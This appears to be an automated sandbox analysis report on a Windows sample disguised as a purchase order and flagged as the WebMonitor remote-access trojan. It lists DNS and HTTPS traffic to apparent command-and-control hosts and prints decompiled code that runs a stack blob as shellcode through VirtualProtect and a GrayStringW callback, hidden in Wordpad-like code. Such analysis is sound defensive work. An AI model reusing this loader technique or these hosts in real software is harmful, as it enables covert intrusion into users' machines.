Aug 12, 2021 07:46:45.716890097 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:46:45.741928101 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 12, 2021 07:46:47.215291977 CEST	53	52123	114.114.114.114	192.168.2.3
Aug 12, 2021 07:46:47.217145920 CEST	53	56338	114.114.114.114	192.168.2.3
Aug 12, 2021 07:46:47.231686115 CEST	53	56338	114.114.114.114	192.168.2.3
Aug 12, 2021 07:46:47.237127066 CEST	53	52123	114.114.114.114	192.168.2.3
Aug 12, 2021 07:46:47.306375980 CEST	53	52123	114.114.114.114	192.168.2.3
Aug 12, 2021 07:47:16.037009954 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:47:16.080607891 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 12, 2021 07:47:18.298057079 CEST	55708	53	192.168.2.3	8.8.8.8
Aug 12, 2021 07:47:18.334089994 CEST	53	55708	8.8.8.8	192.168.2.3

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 12, 2021 07:46:44.412719965 CEST	192.168.2.3	114.114.114.114	a527	(Port unreachable)	Destination Unreachable
Aug 12, 2021 07:46:45.594379902 CEST	192.168.2.3	114.114.114.114	a527	(Port unreachable)	Destination Unreachable
Aug 12, 2021 07:46:47.215879917 CEST	192.168.2.3	114.114.114.114	a527	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 12, 2021 07:45:47.742536068 CEST	192.168.2.3	8.8.8.8	0x8fe3	Standard query (0)	sdns.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:45:47.920039892 CEST	192.168.2.3	8.8.8.8	0xaa48	Standard query (0)	ntp.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:45:48.030041933 CEST	192.168.2.3	185.243.215.214	0x2fe0	Standard query (0)	fad3f505ccdd111848ff5bf3a7d712ae.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:45:49.033164978 CEST	192.168.2.3	185.243.215.214	0x2fe0	Standard query (0)	fad3f505ccdd111848ff5bf3a7d712ae.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:45:50.048294067 CEST	192.168.2.3	185.243.215.214	0x2fe0	Standard query (0)	fad3f505ccdd111848ff5bf3a7d712ae.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:45:52.095144987 CEST	192.168.2.3	185.243.215.214	0x2fe0	Standard query (0)	fad3f505ccdd111848ff5bf3a7d712ae.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:45:56.143043995 CEST	192.168.2.3	185.243.215.214	0x2fe0	Standard query (0)	fad3f505ccdd111848ff5bf3a7d712ae.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:00.452193975 CEST	192.168.2.3	8.8.8.8	0x487	Standard query (0)	ntp.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:00.565773964 CEST	192.168.2.3	185.243.215.214	0x6716	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:01.581136942 CEST	192.168.2.3	185.243.215.214	0x6716	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:02.643002987 CEST	192.168.2.3	185.243.215.214	0x6716	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:04.642723083 CEST	192.168.2.3	185.243.215.214	0x6716	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:08.699170113 CEST	192.168.2.3	185.243.215.214	0x6716	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:12.772212029 CEST	192.168.2.3	185.243.215.214	0x3b14	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:14.277606010 CEST	192.168.2.3	185.243.215.214	0x3b14	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:15.284924984 CEST	192.168.2.3	185.243.215.214	0x3b14	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:17.331928968 CEST	192.168.2.3	185.243.215.214	0x3b14	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:21.340348959 CEST	192.168.2.3	185.243.215.214	0x3b14	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:26.488425016 CEST	192.168.2.3	8.8.8.8	0xc41b	Standard query (0)	ntp.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:26.631669044 CEST	192.168.2.3	1.2.4.8	0x6773	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:26.838856936 CEST	192.168.2.3	1.2.4.8	0x12c6	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:28.235521078 CEST	192.168.2.3	8.8.8.8	0x3fd9	Standard query (0)	ntp.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:28.346050978 CEST	192.168.2.3	114.114.114.114	0x5760	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:29.394819021 CEST	192.168.2.3	114.114.114.114	0x5760	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:30.442883015 CEST	192.168.2.3	114.114.114.114	0x5760	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:32.513928890 CEST	192.168.2.3	114.114.114.114	0x5760	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:36.505673885 CEST	192.168.2.3	114.114.114.114	0x5760	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:40.541099072 CEST	192.168.2.3	114.114.114.114	0xcd94	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:41.583662033 CEST	192.168.2.3	114.114.114.114	0xcd94	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:42.646384001 CEST	192.168.2.3	114.114.114.114	0xcd94	Standard query (0)	ccee0140345c08734408cf05809907fc.se	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:44.833942890 CEST	192.168.2.3	8.8.8.8	0x419	Standard query (0)	niiarmah.wm01.to	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 12, 2021 07:45:47.807796955 CEST	8.8.8.8	192.168.2.3	0x8fe3	No error (0)	sdns.se		185.243.215.214	A (IP address)	IN (0x0001)
Aug 12, 2021 07:45:47.985032082 CEST	8.8.8.8	192.168.2.3	0xaa48	No error (0)	ntp.se		194.58.200.20	A (IP address)	IN (0x0001)
Aug 12, 2021 07:45:56.197129965 CEST	8.8.8.8	192.168.2.3	0xd8b4	No error (0)	api.globalsign.cloud		104.18.24.243	A (IP address)	IN (0x0001)
Aug 12, 2021 07:45:56.197129965 CEST	8.8.8.8	192.168.2.3	0xd8b4	No error (0)	api.globalsign.cloud		104.18.25.243	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:00.519720078 CEST	8.8.8.8	192.168.2.3	0x487	No error (0)	ntp.se		194.58.200.20	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:26.584278107 CEST	8.8.8.8	192.168.2.3	0xc41b	No error (0)	ntp.se		194.58.200.20	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:26.835854053 CEST	1.2.4.8	192.168.2.3	0x6773	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:27.099960089 CEST	1.2.4.8	192.168.2.3	0x12c6	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:28.286125898 CEST	8.8.8.8	192.168.2.3	0x3fd9	No error (0)	ntp.se		194.58.200.20	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:42.774602890 CEST	114.114.114.114	192.168.2.3	0xcd94	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:44.412622929 CEST	114.114.114.114	192.168.2.3	0x5760	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:44.936559916 CEST	8.8.8.8	192.168.2.3	0x419	No error (0)	niiarmah.wm01.to		45.153.186.90	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:45.594227076 CEST	114.114.114.114	192.168.2.3	0x5760	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:47.215291977 CEST	114.114.114.114	192.168.2.3	0x5760	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:47.217145920 CEST	114.114.114.114	192.168.2.3	0xcd94	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:47.231686115 CEST	114.114.114.114	192.168.2.3	0xcd94	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:47.237127066 CEST	114.114.114.114	192.168.2.3	0x5760	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)
Aug 12, 2021 07:46:47.306375980 CEST	114.114.114.114	192.168.2.3	0x5760	Name error (3)	ccee0140345c08734408cf05809907fc.se	none	none	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Aug 12, 2021 07:46:45.327771902 CEST	45.153.186.90	443	192.168.2.3	49740	CN=*.wm01.to, O=Internet Widgits Pty Ltd, L=SE, ST=SE, C=SE	CN=*.wm01.to, O=Internet Widgits Pty Ltd, L=SE, ST=SE, C=SE	Mon Jul 20 15:58:05 CEST 2020	Thu Jul 18 15:58:05 CEST 2030	771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,0	37f463bf4616ecd445d4a1937da06e19

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: NEW PURCHASE ORDER.exe PID: 5772 Parent PID: 5580

General

Start time:	07:45:36
Start date:	12/08/2021
Path:	C:\Users\user\Desktop\NEW PURCHASE ORDER.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\NEW PURCHASE ORDER.exe'
Imagebase:	0x400000
File size:	1006049 bytes
MD5 hash:	BCB77B64EF4A369F8B381AFF4C6F1C57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebMonitor, Description: Yara detected WebMonitor RAT, Source: 00000000.00000002.223260400.00000000021D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: NEW PURCHASE ORDER.exe PID: 5940 Parent PID: 5772

General

Start time:	07:45:37
Start date:	12/08/2021
Path:	C:\Users\user\Desktop\NEW PURCHASE ORDER.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\NEW PURCHASE ORDER.exe'
Imagebase:	0x400000
File size:	1006049 bytes
MD5 hash:	BCB77B64EF4A369F8B381AFF4C6F1C57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_WebMonitor, Description: Yara detected WebMonitor RAT, Source: 00000002.00000002.482426794.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_WebMonitor, Description: Yara detected WebMonitor RAT, Source: 00000002.00000001.219606461.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: NEW PURCHASE ORDER.exe PID: 5772 Parent PID: 5580 NEW PURCHASE ORDER.exeCOMMON

Executed Functions

Function 0040315C, Relevance: 75.5, APIs: 36, Strings: 7, Instructions: 265
windowregistrymemoryCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040315C(struct HACCEL__* _a4, int _a16) {
				struct tagRECT _v20;
				struct _WNDCLASSEXW _v68;
				char _v72;
				intOrPtr _v76;
				char _v80;
				long _v84;
				void* _v92;
				struct tagMSG _v120;
				struct tagMONITORINFO _v160;
				_Unknown_base(*)() _v804;
				void* _v1804;
				void* __edi;
				void* __esi;
				int _t76;
				struct HICON__* _t84;
				struct HMONITOR__* _t88;
				int _t101;
				int _t134;
				struct HINSTANCE__* _t136;
				struct HACCEL__* _t138;
				void* _t144;
				int _t151;
				struct HWND__* _t152;
				int _t157;
				void* _t160;
				intOrPtr* _t161;
				int _t166;

				_v80 = 8;
				_v76 = 0x604;
				memcpy( &_v804, 0x406528, 0xa0 << 2);
				_t161 = _t160 + 0xc;
				asm("movsw");
				asm("movsb"); // executed
				VirtualProtect( &_v804, 0x283, 0x40,  &_v84); // executed
				GrayStringW(GetDC(0), 0,  &_v804,  &_v1804, 0, 0, 0, 0, 0); // executed
				__imp__InitCommonControlsEx( &_v80);
				_t136 = _a4;
				_a4 = LoadAcceleratorsW(_t136, L"MAINACCELTABLE");
				_v68.cbSize = 0x30;
				_v68.style = 0;
				_v68.lpfnWndProc = E0040348B;
				_v68.cbClsExtra = 0;
				_v68.cbWndExtra = 4;
				_v68.hInstance = _t136;
				_v68.hIcon = LoadIconW(_t136, 0x66);
				_t76 = GetSystemMetrics(0x32);
				_v68.hIconSm = LoadImageW(_t136, 0x66, 1, GetSystemMetrics(0x31), _t76, 0x8000);
				_v68.hCursor = LoadCursorW(0, 0x7f01);
				_v68.hbrBackground = GetSysColorBrush(5);
				_v68.lpszMenuName = 0x898;
				_v68.lpszClassName = L"WORDPADTOP";
				RegisterClassExW( &_v68);
				_v68.lpfnWndProc = 0x400000;
				_v68.style = 0;
				_v68.cbClsExtra = 0;
				_v68.cbWndExtra = 0;
				_v68.hInstance = _t136;
				_v68.hIcon = 0;
				_v68.hIconSm = 0;
				_t84 = LoadCursorW(0, 0x7f01);
				_v68.hbrBackground = _v68.hbrBackground & 0x00000000;
				_v68.lpszMenuName = _v68.lpszMenuName & 0x00000000;
				_v68.hCursor = _t84;
				_v68.lpszClassName = L"PrtPreview";
				RegisterClassExW( &_v68);
				0x400000( &_v20);
				_t88 =  &_v20;
				__imp__MonitorFromRect(_t88, 1);
				_v160.cbSize = 0x28;
				GetMonitorInfoW(_t88,  &_v160);
				_t157 = _v20.left;
				_t151 = _v20.top;
				IntersectRect( &(_v160.rcWork),  &(_v160.rcWork),  &_v20);
				if(IsRectEmpty( &(_v160.rcWork)) != 0) {
					_t157 = 0x80000000;
					_t151 = 0x80000000;
				}
				 *0x408028 = CreateWindowExW(0, L"WORDPADTOP", L"Wine Wordpad", 0x2cf0000, _t157, _t151, _v20.right - _v20.left, _v20.bottom - _v20.top, 0, 0, _t136, 0);
				0x400000( &_v72);
				_t101 = _a16;
				_pop(_t144);
				if(_t101 == 1 || _t101 == 0xa) {
					_t144 = 3;
					_t101 =  !=  ? _t144 : _t101;
					_t166 = _t101;
				}
				ShowWindow( *0x408028, _t101);
				E00404F82(0);
				E00404F21(_t166);
				 *0x408010 = 2;
				E00404F21(_t166);
				E0040502E();
				 *_t161 = 0x89a;
				 *0x408034 = LoadMenuW(_t136, ??);
				0x400000();
				_t152 = GetDlgItem(GetDlgItem( *0x408028, 0x7d4), 0x7df);
				SendMessageW(GetDlgItem( *0x408028, 0x7d1), 0xd6,  &_v92, 0);
				SendMessageW(_t152, 0x400,  &_v92, SetWindowLongW(_t152, 0xfffffffc, 0x400000));
				E0040179C(_t144, _t152, SendMessageW, GetCommandLineW());
				if(GetMessageW( &_v120, 0, 0, 0) == 0) {
					L12:
					return 0;
				} else {
					_t138 = _a4;
					do {
						if(IsDialogMessageW( *0x408030,  &_v120) == 0 && TranslateAcceleratorW( *0x408028, _t138,  &_v120) == 0) {
							TranslateMessage( &_v120);
							DispatchMessageW( &_v120);
							_t134 = PeekMessageW( &_v120, 0, 0, 0, 0);
							if(_t134 == 0) {
								SendMessageW( *0x408028, 0x400, _t134, _t134);
							}
						}
					} while (GetMessageW( &_v120, 0, 0, 0) != 0);
					goto L12;
				}
			}

0x0040316d
0x00403179
0x00403186
0x00403186
0x0040318e
0x0040319c
0x0040319d
0x004031c1
0x004031cb
0x004031d1
0x004031e3
0x004031e6
0x004031ed
0x004031f0
0x004031f7
0x004031fa
0x00403201
0x00403217
0x0040321a
0x00403239
0x00403240
0x0040324f
0x00403256
0x0040325d
0x00403264
0x00403268
0x0040326f
0x00403278
0x0040327b
0x0040327e
0x00403281
0x00403284
0x00403287
0x00403289
0x0040328d
0x00403291
0x00403298
0x0040329f
0x004032a5
0x004032ad
0x004032b1
0x004032bd
0x004032c9
0x004032cf
0x004032d5
0x004032e1
0x004032f6
0x004032f8
0x004032fd
0x004032fd
0x0040332b
0x00403334
0x00403339
0x0040333c
0x00403340
0x0040334d
0x0040334e
0x0040334e
0x0040334e
0x00403358
0x00403360
0x00403365
0x0040336a
0x00403374
0x00403379
0x0040337e
0x0040338c
0x00403391
0x004033b1
0x004033d3
0x004033ee
0x004033f7
0x0040340e
0x00403484
0x00403488
0x00403410
0x00403410
0x00403413
0x00403425
0x00403440
0x0040344a
0x0040345a
0x00403462
0x00403471
0x00403471
0x00403462
0x0040347e
0x00000000
0x00403413

APIs

VirtualProtect.KERNELBASE(?,00000283,00000040,?,?,?,00000000), ref: 0040319D
GetDC.USER32(00000000), ref: 004031BA
GrayStringW.USER32(00000000,?,?,00000000), ref: 004031C1
InitCommonControlsEx.COMCTL32(00000008,?,?,00000000), ref: 004031CB
LoadAcceleratorsW.USER32 ref: 004031DA
LoadIconW.USER32(?,00000066), ref: 00403204
GetSystemMetrics.USER32 ref: 0040321A
GetSystemMetrics.USER32 ref: 0040321F
LoadImageW.USER32 ref: 00403227
LoadCursorW.USER32(00000000,00007F01), ref: 0040323C
GetSysColorBrush.USER32(00000005), ref: 00403243
RegisterClassExW.USER32 ref: 00403264
LoadCursorW.USER32(00000000,00007F01), ref: 00403287
RegisterClassExW.USER32 ref: 0040329F
MonitorFromRect.USER32(00401134,00000001), ref: 004032B1
GetMonitorInfoW.USER32 ref: 004032C9
IntersectRect.USER32 ref: 004032E1
IsRectEmpty.USER32(?), ref: 004032EE
CreateWindowExW.USER32 ref: 00403325
ShowWindow.USER32(?,00000000), ref: 00403358
LoadMenuW.USER32 ref: 00403386
GetDlgItem.USER32 ref: 004033AC
GetDlgItem.USER32 ref: 004033AF
GetDlgItem.USER32 ref: 004033CA
SendMessageW.USER32(00000000), ref: 004033D3
SetWindowLongW.USER32 ref: 004033DD
SendMessageW.USER32(00000000,00000400,?,00000000), ref: 004033EE
GetCommandLineW.KERNEL32 ref: 004033F0
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040340A
IsDialogMessageW.USER32(?), ref: 0040341D
TranslateAcceleratorW.USER32(?,?), ref: 00403432
TranslateMessage.USER32(?), ref: 00403440
DispatchMessageW.USER32 ref: 0040344A
PeekMessageW.USER32 ref: 0040345A
SendMessageW.USER32(00000400,00000000,00000000), ref: 00403471
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040347C

Strings

0, xrefs: 004031E6
MAINACCELTABLE, xrefs: 004031D4
(, xrefs: 004032BD
WORDPADTOP, xrefs: 0040331F
Wine Wordpad, xrefs: 0040331A
db@, xrefs: 00403298
(e@, xrefs: 00403174

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Load$ItemRectSendWindow$ClassCursorMetricsMonitorRegisterSystemTranslate$AcceleratorAcceleratorsBrushColorCommandCommonControlsCreateDialogDispatchEmptyFromGrayIconImageInfoInitIntersectLineLongMenuPeekProtectShowStringVirtual
String ID: ($(e@$0$MAINACCELTABLE$WORDPADTOP$Wine Wordpad$db@
API String ID: 3695513527-1361831012
Opcode ID: e39755130ef9d49a52a9a6221850dc107b0fbdd2fbc3f0d87c34b0a05a72d843
Instruction ID: a96ebe5c25a7ba11f216fa88f941318729257454f051b046afb19bea55aae89d
Opcode Fuzzy Hash: e39755130ef9d49a52a9a6221850dc107b0fbdd2fbc3f0d87c34b0a05a72d843
Instruction Fuzzy Hash: ED9119B1D00219AFDB109FA0DD48FAE7BBCEB08315F11443AF506FA191DB799A048F68

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 16.6, APIs: 11, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;

				_push(0xffffffff);
				_push(0x4067b0);
				_push(0x405d0a);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x4099c8 =  *0x4099c8 | 0xffffffff;
				 *0x4099cc =  *0x4099cc | 0xffffffff;
				 *(__p__fmode()) =  *0x4099bc;
				 *(__p__commode()) =  *0x4099b8;
				 *0x4099d0 = _adjust_fdiv;
				E00401173( *_adjust_fdiv);
				if( *0x408020 == 0) {
					__setusermatherr(E00401170);
				}
				E0040115E();
				_push(0x40800c);
				_push(0x408008);
				L00405CEC();
				_v112 =  *0x4099b4;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x4099b0,  &_v112);
				_push(0x408004);
				_push(0x408000);
				L00405CEC();
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E0040315C(GetModuleHandleA(0), 0, _t55, _t38); // executed
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00405CDA();
				return _t41;
			}

0x00401003
0x00401005
0x0040100a
0x00401015
0x00401016
0x00401023
0x00401028
0x0040102d
0x00401034
0x0040103b
0x0040104e
0x0040105c
0x00401065
0x0040106a
0x00401075
0x0040107c
0x00401082
0x00401083
0x00401088
0x0040108d
0x00401092
0x0040109c
0x004010b5
0x004010bb
0x004010c0
0x004010c5
0x004010d2
0x004010d4
0x004010da
0x00401116
0x0040111b
0x0040111c
0x0040111c
0x004010dc
0x004010dc
0x004010dc
0x004010dd
0x004010e0
0x004010e2
0x004010ed
0x004010ef
0x004010ef
0x004010f0
0x004010f0
0x004010ed
0x004010f3
0x004010f7
0x00000000
0x00000000
0x004010fd
0x00401104
0x0040110e
0x00401123
0x00401110
0x00401110
0x00401110
0x0040112f
0x00401134
0x00401138
0x0040113e
0x00401143
0x00401145
0x00401148
0x00401149
0x0040114a
0x00401151

APIs

__set_app_type.MSVCRT ref: 0040102D
__p__fmode.MSVCRT ref: 00401042
__p__commode.MSVCRT ref: 00401050
__setusermatherr.MSVCRT ref: 0040107C
_initterm.MSVCRT ref: 00401092
__getmainargs.MSVCRT ref: 004010B5
_initterm.MSVCRT ref: 004010C5
GetStartupInfoA.KERNEL32(?), ref: 00401104
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00401128
exit.MSVCRT ref: 00401138
_XcptFilter.MSVCRT ref: 0040114A

Memory Dump Source

Source File: 00000000.00000002.222588618.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.222577382.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222607698.0000000000406000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.222613532.000000000040A000.00000002.00020000.sdmp Download File

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID:
API String ID: 801014965-0
Opcode ID: 9d04dfacf5214928995238880d99803aff572869c1b803ce5110ebee996fcd97
Instruction ID: f69d62c708fe64b81b882a97a1bb760ebe7b6a1a257b6f6e27d6669b54549388
Opcode Fuzzy Hash: 9d04dfacf5214928995238880d99803aff572869c1b803ce5110ebee996fcd97
Instruction Fuzzy Hash: A84128B1940344AFDB24DFA5DE45AAA7BB8FB09710F20413FE582B73A1D7784841CB59

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00401928, Relevance: 105.7, APIs: 53, Strings: 7, Instructions: 700
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 57%

			E00401928(void* __fp0, struct HWND__* _a4, unsigned int _a8, signed int _a12) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				short _v36;
				intOrPtr _v38;
				short _v40;
				intOrPtr _v44;
				intOrPtr _v72;
				int _v76;
				char _v92;
				intOrPtr _v124;
				void _v136;
				void _v140;
				void* _v144;
				char _v156;
				short _v192;
				int _v196;
				intOrPtr _v204;
				signed int _v208;
				void _v212;
				void* _v216;
				char _v540;
				int __esi;
				unsigned int _t143;
				signed int _t161;
				signed int _t166;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				int _t198;
				signed int _t204;
				signed int _t208;
				struct HMENU__* _t210;
				signed int _t232;
				struct HMENU__* _t233;
				struct HWND__* _t256;
				signed int _t266;
				struct HMENU__* _t267;
				struct HMENU__* _t268;
				struct HMENU__* _t269;
				struct HMENU__* _t271;
				struct HMENU__* _t274;
				struct HMENU__* _t275;
				struct HMENU__* _t276;
				struct HMENU__* _t277;
				signed int _t278;
				struct HMENU__* _t279;
				struct HMENU__* _t280;
				struct HMENU__* _t284;
				signed int _t285;
				struct HMENU__* _t286;
				struct HMENU__* _t287;
				struct HMENU__* _t288;
				signed int _t290;
				struct HMENU__* _t292;
				struct HMENU__* _t293;
				struct HMENU__* _t294;
				int _t295;
				struct HMENU__* _t296;
				struct HMENU__* _t297;
				struct HMENU__* _t298;
				struct HMENU__* _t299;
				signed int _t300;
				signed int _t301;
				signed short _t302;
				struct HMENU__* _t304;
				struct HWND__* _t307;
				void* _t308;
				signed int _t309;
				void* _t310;
				struct HWND__* _t313;
				void* _t315;
				signed int _t316;
				struct HMENU__* _t320;
				struct HMENU__* _t321;
				void* _t334;

				_t256 = _a4;
				_t307 = GetDlgItem(_t256, 0x7d1);
				_v8 = _t307;
				if(_a12 == _t307) {
					L141:
					return 0;
				}
				_t143 = _a8;
				_t302 = _t143 & 0x0000ffff;
				_t309 = _t302 & 0x0000ffff;
				_v16 = _t302;
				_t266 = _t309;
				_t334 = _t309 - 0x44c;
				if(_t334 > 0) {
					__eflags = _t309 - 0x524;
					if(__eflags > 0) {
						__eflags = _t309 - 0x5dd;
						if(__eflags > 0) {
							__eflags = _t309 - 0x642;
							if(__eflags > 0) {
								_t267 = _t266 - 0x643;
								__eflags = _t267;
								if(_t267 == 0) {
									ShellAboutW( *0x408028, L"Wine Wordpad", 0, LoadImageW(GetModuleHandleW(0), 0x66, 1, 0x30, 0x30, 0x8000));
									goto L141;
								}
								_t268 = _t267 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									E00403CCC(_t309);
									goto L141;
								}
								_t269 = _t268 - 0x199;
								__eflags = _t269;
								if(_t269 == 0) {
									__eflags = _t143 >> 0x10 - 9;
									if(_t143 >> 0x10 == 9) {
										E00404109(_a12,  &_v92, 0x20);
										E004045B1( &_v92);
									}
									goto L141;
								}
								__eflags = _t269 == 1;
								if(_t269 == 1) {
									__eflags = _t143 >> 0x10 - 9;
									if(_t143 >> 0x10 == 9) {
										E00404109(_a12,  &_v540, 0x100);
										E00404601(__fp0, _a12,  &_v540);
									}
									goto L141;
								}
								L134:
								_push(_a12);
								_push(_t143);
								_push(0x111);
